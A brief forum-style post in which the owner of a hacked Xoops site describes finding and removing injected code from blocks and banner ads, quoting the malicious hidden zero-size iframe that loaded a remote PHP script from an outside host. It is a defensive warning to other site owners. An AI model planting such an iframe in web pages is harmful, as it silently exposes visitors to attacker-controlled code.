4
My Xoops-based site was recently hacked - it took me a minute to figure out what had happened, but just in case you run across it...
Opening my site I noticed a warning - something about:
""remote data services data control", and prompting me to allow it.
Well F**K that - after poking around I found this code appended to a number of my blocks and banner ads:
<iframe src="http://uokill.zh.od.ua/out.,php" width="0" height="0"
frameborder="0"></iframe></div>
Which would run a remote .php script ("out.php"). Took a few minutes to edit out all the malicious code, but if you have a similar problem, hopefully this will help you out.